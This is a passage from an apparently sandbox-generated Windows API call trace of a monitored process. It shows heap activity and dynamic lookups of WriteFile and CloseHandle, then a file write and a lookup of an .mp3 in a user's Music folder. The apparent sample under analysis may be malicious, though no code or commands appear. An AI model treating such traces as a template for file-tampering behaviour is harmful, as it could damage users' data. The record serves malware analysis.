Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af598 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0037.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.239] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0037.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.242] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0037.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88c790 [0037.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88c790, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0037.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.243] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0037.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.243] WriteFile (in: hFile=0x128, lpBuffer=0x7c95d0*, nNumberOfBytesToWrite=0x1143, lpNumberOfBytesWritten=0x6ae4e0, lpOverlapped=0x0 | out: lpBuffer=0x7c95d0*, lpNumberOfBytesWritten=0x6ae4e0*=0x1143, lpOverlapped=0x0) returned 1 [0037.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.244] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.244] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.244] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.244] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.244] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.244] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.244] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.245] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0037.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.245] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.245] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.245] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.245] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.245] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3", lpFilePart=0x0) returned 0x33 [0037.246] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f11b00, ftCreationTime.dwHighDateTime=0x1d5c549, ftLastAccessTime.dwLowDateTime=0x61550420, ftLastAccessTime.dwHighDateTime=0x1d5c100, ftLastWriteTime.dwLowDateTime=0x15e95800, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1143, 